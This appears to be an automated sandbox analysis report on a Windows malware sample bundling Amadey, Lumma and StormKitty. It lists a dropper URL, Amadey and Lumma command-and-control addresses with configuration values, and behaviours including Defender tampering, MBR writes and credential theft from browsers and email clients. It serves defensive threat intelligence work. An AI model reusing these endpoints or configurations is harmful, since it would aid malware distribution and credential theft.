amadey | a2acf5edfa7fd31d1c407418792b416f2727f009aa3dc0d3e4c9625bd04f5ade

Analysis

max time kernel
120s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20250313-en
resource tags

arch:x64arch:x86image:win10v2004-20250313-enlocale:en-usos:windows10-2004-x64system
submitted
31/03/2025, 09:37

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2025-03-31_15b187760f4551f2a6827099467de67e_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
Size

938KB
MD5

15b187760f4551f2a6827099467de67e
SHA1

40ef889494aaedd66d8d08eb020cbbfd412f9b72
SHA256

a2acf5edfa7fd31d1c407418792b416f2727f009aa3dc0d3e4c9625bd04f5ade
SHA512

4f4ba88fa44f952c55917364a7072204ac3357ebc47c5844964eb9cf835cd8f867dd014fcc1fee2a1e19956ddac1947763cc8ffe811a357602ac8e63ff0c5f00
SSDEEP

24576:qqDEvCTbMWu7rQYlBQcBiT6rprG8a48u:qTvC/MTQYxsWR7a48

Score

10^/10

amadey lumma stormkitty 092155 bootkit collection credential_access defense_evasion discovery execution exploit persistence privilege_escalation spyware stealer trojan upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

http://176.113.115.6

Attributes

install_dir
bb556cff4a
install_file
rapes.exe
strings_key
a131b127e996a898cd19ffb2d92e481b
url_paths
/Ni9kiput/index.php

rc4.plain

Extracted

Family

lumma

https://navstarx.shop/FoaJSi

https://metalsyo.digital/opsa

https://ironloxp.live/aksdd

https://starcloc.bet/GOksAo

https://advennture.top/GKsiio

https://targett.top/dsANGt

https://spacedbv.world/EKdlsk

https://galxnetb.today/GsuIAo

https://qadvennture.top/GKsiio

https://rodformi.run/aUosoz

https://wnavstarx.shop/FoaJSi

https://cosmosyf.top/GOsznj

https://esccapewz.run/ANSbwqy

https://travewlio.shop/ZNxbHi

https://touvrlane.bet/ASKwjq

https://sighbtseeing.shop/ASJnzh

https://holidamyup.today/AOzkns

https://triplooqp.world/APowko

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Amadey family
amadey
Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Lumma family
lumma

Modifies security service 2 TTPs 2 IoCs

defense_evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Security	reg.exe

StormKitty
StormKitty is an open source info stealer written in C#.
stealer stormkitty

StormKitty payload 1 IoCs

resource	yara_rule
behavioral1/memory/1540-489-0x0000000000190000-0x00000000001D4000-memory.dmp	family_stormkitty

Stormkitty family
stormkitty

Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs

description	pid	Process	procid_target
PID 3256 created 3412	3256	FOm9tvc.exe	56
PID 6772 created 3412	6772	FOm9tvc.exe	56

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 12 IoCs

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	b35e26dfa6.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	aa8acb4459.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	TempM0VBHEAGQWTZLSKTQAIWO2UDWNLLKVTH.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	73a0821db9.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	fc4df60a0c.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	2b3f7991fc.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	6e8a51d5f0.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	555d5afd67.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	07d0c5035d.exe

Blocklisted process makes network request 1 IoCs

flow	pid	Process
14	5956	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 11 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2320	powershell.exe
1288	powershell.exe
6444	powershell.exe
4788	powershell.exe
1544	powershell.exe
1356	powershell.exe
5852	powershell.exe
888	powershell.exe
464	powershell.exe
5956	powershell.exe
4164	PowerShell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002

Downloads MZ/PE file 22 IoCs

flow	pid	Process
14	5956	powershell.exe
87	1168	rapes.exe
128	2448	futors.exe
128	2448	futors.exe
321	4404	1f9e17497b.exe
321	4404	1f9e17497b.exe
321	4404	1f9e17497b.exe
321	4404	1f9e17497b.exe
321	4404	1f9e17497b.exe
321	4404	1f9e17497b.exe
98	2448	futors.exe
29	1168	rapes.exe
29	1168	rapes.exe
29	1168	rapes.exe
29	1168	rapes.exe
95	1168	rapes.exe
95	1168	rapes.exe
156	1168	rapes.exe
79	1168	rapes.exe
171	2448	futors.exe
339	1168	rapes.exe
146	2448	futors.exe

Event Triggered Execution: AppInit DLLs 1 TTPs
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes.
persistence privilege_escalation

AppInit DLLs
T1546.010

Possible privilege escalation attempt 4 IoCs

exploit

pid	Process
4980	takeown.exe
4396	icacls.exe
4928	takeown.exe
688	icacls.exe

Stops running service(s) 4 TTPs
defense_evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Uses browser remote debugging 2 TTPs 17 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

credential_access stealer

Steal Web Session Cookie

T1539

Modify Authentication Process

T1556

pid	Process
3232	chrome.exe
5152	chrome.exe
3884	msedge.exe
5228	chrome.exe
5720	chrome.exe
5572	chrome.exe
2420	chrome.exe
452	chrome.exe
5752	chrome.exe
5256	chrome.exe
3840	chrome.exe
6640	chrome.exe
8	chrome.exe
4868	msedge.exe
4944	msedge.exe
4252	chrome.exe
5564	chrome.exe

Checks BIOS information in registry 2 TTPs 24 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	73a0821db9.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	6e8a51d5f0.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	555d5afd67.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	07d0c5035d.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	07d0c5035d.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	aa8acb4459.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	6e8a51d5f0.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	TempM0VBHEAGQWTZLSKTQAIWO2UDWNLLKVTH.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	TempM0VBHEAGQWTZLSKTQAIWO2UDWNLLKVTH.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	fc4df60a0c.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	fc4df60a0c.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	b35e26dfa6.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	aa8acb4459.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	73a0821db9.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	555d5afd67.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	b35e26dfa6.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	2b3f7991fc.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	2b3f7991fc.exe

Checks computer location settings 2 TTPs 17 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation	221.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation	nAM5wkr.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation	apple.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation	Bell_Setup16.tmp
Key value queried	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation	bprz1VA.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation	7IIl2eE.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation	TempM0VBHEAGQWTZLSKTQAIWO2UDWNLLKVTH.EXE
Key value queried	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation	feb9141ed1.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation	gLLOqKC.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation	futors.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation	221.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation	221.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation	amnew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation	221.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation	bprz1VA.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation	rapes.exe

Executes dropped EXE 58 IoCs

pid	Process
5000	TempM0VBHEAGQWTZLSKTQAIWO2UDWNLLKVTH.EXE
1168	rapes.exe
2356	73a0821db9.exe
5980	feb9141ed1.exe
2056	221.exe
5412	221.exe
4728	555d5afd67.exe
2164	SPOKz5U.exe
924	nAM5wkr.exe
4168	xdwdkernel.exe
4080	rapes.exe
1456	xdwdkernel.exe
5000	bprz1VA.exe
3968	wow_6262_build (9).exe
5160	Built.exe
3444	Luma_Crypt_Packlab.exe
5760	Built.exe
3256	FOm9tvc.exe
512	amnew.exe
2448	futors.exe
5784	gLLOqKC.exe
2192	a5.exe
2220	v7942.exe
3000	apple.exe
3988	221.exe
2992	221.exe
3968	alex1dskfmdsf.exe
4404	1f9e17497b.exe
3408	Bell_Setup16.exe
4276	Bell_Setup16.tmp
4872	Bell_Setup16.exe
5404	Bell_Setup16.tmp
1288	07d0c5035d.exe
748	svchost015.exe
6732	fc4df60a0c.exe
2300	bot.exe
6252	bot.exe
6772	FOm9tvc.exe
4960	kololololo.exe
6996	svchost015.exe
7124	bprz1VA.exe
208	wow_6262_build (9).exe
6464	Built.exe
4820	Luma_Crypt_Packlab.exe
6688	Built.exe
6340	legendarik.exe
464	rapes.exe
6488	b35e26dfa6.exe
512	futors.exe
6960	aa8acb4459.exe
5928	2b3f7991fc.exe
3696	xdwdkernel.exe
5440	6e8a51d5f0.exe
2072	svchost015.exe
6956	7IIl2eE.exe
3232	Rm3cVPI.exe
6532	svchost015.exe
5424	SPOKz5U.exe

Identifies Wine through registry keys 2 TTPs 12 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Wine	73a0821db9.exe
Key opened	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Wine	b35e26dfa6.exe
Key opened	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Wine	aa8acb4459.exe
Key opened	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Wine	TempM0VBHEAGQWTZLSKTQAIWO2UDWNLLKVTH.EXE
Key opened	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Wine	555d5afd67.exe
Key opened	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Wine	07d0c5035d.exe
Key opened	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Wine	fc4df60a0c.exe
Key opened	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Wine	2b3f7991fc.exe
Key opened	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Wine	6e8a51d5f0.exe
Key opened	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Wine	rapes.exe

Loads dropped DLL 64 IoCs

pid	Process
4168	xdwdkernel.exe
4864	Process not Found
1456	xdwdkernel.exe
5160	Built.exe
5760	Built.exe
5760	Built.exe
5760	Built.exe
5760	Built.exe
5760	Built.exe
5760	Built.exe
5760	Built.exe
5760	Built.exe
5760	Built.exe
5760	Built.exe
5760	Built.exe
5760	Built.exe
5760	Built.exe
5760	Built.exe
5760	Built.exe
5760	Built.exe
5760	Built.exe
5760	Built.exe
5760	Built.exe
4336	Process not Found
4024	Process not Found
5416	Process not Found
936	Process not Found
1356	powershell.exe
2640	tasklist.exe
964	WMIC.exe
2320	powershell.exe
4216	Process not Found
4440	Process not Found
748	Process not Found
2192	a5.exe
2028	chrome.exe
5720	chrome.exe
6088	chrome.exe
888	elevation_service.exe
4380	Process not Found
3444	Process not Found
5496	Process not Found
1144	Process not Found
4828	timeout.exe
4524	Process not Found
1572	chrome.exe
5564	chrome.exe
4860	chrome.exe
6012	elevation_service.exe
3652	regsvr32.exe
5980	Process not Found
3884	msedge.exe
4580	msedge.exe
2080	msedge.exe
4296	elevation_service.exe
5536	Process not Found
5348	Process not Found
1288	powershell.exe
6436	Process not Found
6444	powershell.exe
6632	Process not Found
888	Process not Found
6856	Process not Found
1668	Process not Found

Modifies file permissions 1 TTPs 4 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
4980	takeown.exe
4396	icacls.exe
4928	takeown.exe
688	icacls.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001

Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe
Key opened	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe
Key opened	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe
Key opened	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe
Key opened	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe
Key opened	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\aa8acb4459.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10046160101\\aa8acb4459.exe"	futors.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\6e8a51d5f0.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10046170101\\6e8a51d5f0.exe"	futors.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Looks up external IP address via web service 5 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
302	ipinfo.io
81	ip-api.com
84	ipinfo.io
85	ipinfo.io
301	ipinfo.io

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PHYSICALDRIVE0	73a0821db9.exe

Enumerates processes with tasklist 1 TTPs 2 IoCs

discovery

Process Discovery

T1057

pid	Process
2640	tasklist.exe
4176	tasklist.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 12 IoCs

pid	Process
5000	TempM0VBHEAGQWTZLSKTQAIWO2UDWNLLKVTH.EXE
1168	rapes.exe
2356	73a0821db9.exe
4728	555d5afd67.exe
4080	rapes.exe
1288	07d0c5035d.exe
6732	fc4df60a0c.exe
464	rapes.exe
6488	b35e26dfa6.exe
6960	aa8acb4459.exe
5928	2b3f7991fc.exe
5440	6e8a51d5f0.exe

Suspicious use of SetThreadContext 15 IoCs

description	pid	Process	procid_target
PID 2164 set thread context of 464	2164	SPOKz5U.exe	176
PID 3968 set thread context of 5564	3968	wow_6262_build (9).exe	204
PID 3444 set thread context of 2212	3444	Luma_Crypt_Packlab.exe	205
PID 3256 set thread context of 1540	3256	FOm9tvc.exe	220
PID 3968 set thread context of 2684	3968	alex1dskfmdsf.exe	320
PID 1288 set thread context of 748	1288	07d0c5035d.exe	350
PID 6772 set thread context of 6420	6772	FOm9tvc.exe	369
PID 4960 set thread context of 6656	4960	kololololo.exe	371
PID 6732 set thread context of 6996	6732	fc4df60a0c.exe	372
PID 208 set thread context of 5228	208	wow_6262_build (9).exe	425
PID 4820 set thread context of 6500	4820	Luma_Crypt_Packlab.exe	383
PID 6340 set thread context of 7108	6340	legendarik.exe	391
PID 6960 set thread context of 2072	6960	aa8acb4459.exe	413
PID 5440 set thread context of 6532	5440	6e8a51d5f0.exe	420
PID 5424 set thread context of 2592	5424	SPOKz5U.exe	422

UPX packed file 56 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x00070000000242ff-377.dat	upx
behavioral1/memory/5760-381-0x00007FFA364A0000-0x00007FFA36A90000-memory.dmp	upx
behavioral1/files/0x000c0000000240eb-383.dat	upx
behavioral1/memory/5760-405-0x00007FFA3E890000-0x00007FFA3E8BD000-memory.dmp	upx
behavioral1/memory/5760-404-0x00007FFA3F1F0000-0x00007FFA3F209000-memory.dmp	upx
behavioral1/memory/5760-402-0x00007FFA4EE30000-0x00007FFA4EE3F000-memory.dmp	upx
behavioral1/memory/5760-401-0x00007FFA3F580000-0x00007FFA3F5A4000-memory.dmp	upx
behavioral1/files/0x00070000000242fd-386.dat	upx
behavioral1/memory/5760-414-0x00007FFA4E310000-0x00007FFA4E333000-memory.dmp	upx
behavioral1/memory/5760-415-0x00007FFA36320000-0x00007FFA36496000-memory.dmp	upx
behavioral1/memory/5760-416-0x00007FFA39310000-0x00007FFA39329000-memory.dmp	upx
behavioral1/memory/5760-418-0x00007FFA35DF0000-0x00007FFA36319000-memory.dmp	upx
behavioral1/memory/5760-422-0x00007FFA38600000-0x00007FFA386CD000-memory.dmp	upx
behavioral1/memory/5760-421-0x00007FFA392D0000-0x00007FFA39303000-memory.dmp	upx
behavioral1/memory/5760-420-0x00007FFA4ED00000-0x00007FFA4ED0D000-memory.dmp	upx
behavioral1/memory/5760-417-0x00007FFA364A0000-0x00007FFA36A90000-memory.dmp	upx
behavioral1/memory/5760-425-0x00007FFA4E300000-0x00007FFA4E30D000-memory.dmp	upx
behavioral1/memory/5760-424-0x00007FFA3F580000-0x00007FFA3F5A4000-memory.dmp	upx
behavioral1/memory/5760-423-0x00007FFA392B0000-0x00007FFA392C4000-memory.dmp	upx
behavioral1/memory/5760-426-0x00007FFA35CD0000-0x00007FFA35DEC000-memory.dmp	upx
behavioral1/memory/5760-460-0x00007FFA35CD0000-0x00007FFA35DEC000-memory.dmp	upx
behavioral1/memory/5760-459-0x00007FFA4E300000-0x00007FFA4E30D000-memory.dmp	upx
behavioral1/memory/5760-470-0x00007FFA38600000-0x00007FFA386CD000-memory.dmp	upx
behavioral1/memory/5760-469-0x00007FFA392D0000-0x00007FFA39303000-memory.dmp	upx
behavioral1/memory/5760-471-0x00007FFA35DF0000-0x00007FFA36319000-memory.dmp	upx
behavioral1/memory/5760-468-0x00007FFA39310000-0x00007FFA39329000-memory.dmp	upx
behavioral1/memory/5760-467-0x00007FFA36320000-0x00007FFA36496000-memory.dmp	upx
behavioral1/memory/5760-466-0x00007FFA4E310000-0x00007FFA4E333000-memory.dmp	upx
behavioral1/memory/5760-465-0x00007FFA3E890000-0x00007FFA3E8BD000-memory.dmp	upx
behavioral1/memory/5760-464-0x00007FFA3F1F0000-0x00007FFA3F209000-memory.dmp	upx
behavioral1/memory/5760-463-0x00007FFA4EE30000-0x00007FFA4EE3F000-memory.dmp	upx
behavioral1/memory/5760-462-0x00007FFA3F580000-0x00007FFA3F5A4000-memory.dmp	upx
behavioral1/memory/5760-461-0x00007FFA4ED00000-0x00007FFA4ED0D000-memory.dmp	upx
behavioral1/memory/5760-458-0x00007FFA392B0000-0x00007FFA392C4000-memory.dmp	upx
behavioral1/memory/5760-446-0x00007FFA364A0000-0x00007FFA36A90000-memory.dmp	upx
behavioral1/memory/6688-1839-0x00007FFA364A0000-0x00007FFA36A90000-memory.dmp	upx
behavioral1/memory/6688-1843-0x00007FFA51CF0000-0x00007FFA51D1D000-memory.dmp	upx
behavioral1/memory/6688-1842-0x00007FFA51D50000-0x00007FFA51D69000-memory.dmp	upx
behavioral1/memory/6688-1841-0x00007FFA57600000-0x00007FFA5760F000-memory.dmp	upx
behavioral1/memory/6688-1840-0x00007FFA51D70000-0x00007FFA51D94000-memory.dmp	upx
behavioral1/memory/6688-1860-0x00007FFA38670000-0x00007FFA387E6000-memory.dmp	upx
behavioral1/memory/6688-1859-0x00007FFA51CC0000-0x00007FFA51CE3000-memory.dmp	upx
behavioral1/memory/6688-1862-0x00007FFA559D0000-0x00007FFA559DD000-memory.dmp	upx
behavioral1/memory/6688-1861-0x00007FFA51980000-0x00007FFA51999000-memory.dmp	upx
behavioral1/memory/6688-1865-0x00007FFA35EA0000-0x00007FFA35F6D000-memory.dmp	upx
behavioral1/memory/6688-1864-0x00007FFA35F70000-0x00007FFA36499000-memory.dmp	upx
behavioral1/memory/6688-1863-0x00007FFA4D630000-0x00007FFA4D663000-memory.dmp	upx
behavioral1/memory/6688-1874-0x00007FFA364A0000-0x00007FFA36A90000-memory.dmp	upx
behavioral1/memory/6688-1873-0x00007FFA51D40000-0x00007FFA51D4D000-memory.dmp	upx
behavioral1/memory/6688-1872-0x00007FFA51960000-0x00007FFA51974000-memory.dmp	upx
behavioral1/memory/6688-1877-0x00007FFA35D80000-0x00007FFA35E9C000-memory.dmp	upx
behavioral1/memory/6688-1876-0x00007FFA51D70000-0x00007FFA51D94000-memory.dmp	upx
behavioral1/memory/6688-1954-0x00007FFA51D50000-0x00007FFA51D69000-memory.dmp	upx
behavioral1/memory/6688-1953-0x00007FFA57600000-0x00007FFA5760F000-memory.dmp	upx
behavioral1/memory/6688-1952-0x00007FFA51D70000-0x00007FFA51D94000-memory.dmp	upx
behavioral1/memory/6688-1951-0x00007FFA364A0000-0x00007FFA36A90000-memory.dmp	upx

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Windows Defender\es-ES\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\it-IT\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\es-ES\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\it-IT\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\ja-JP\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\shellext.dll.mui	cmd.exe
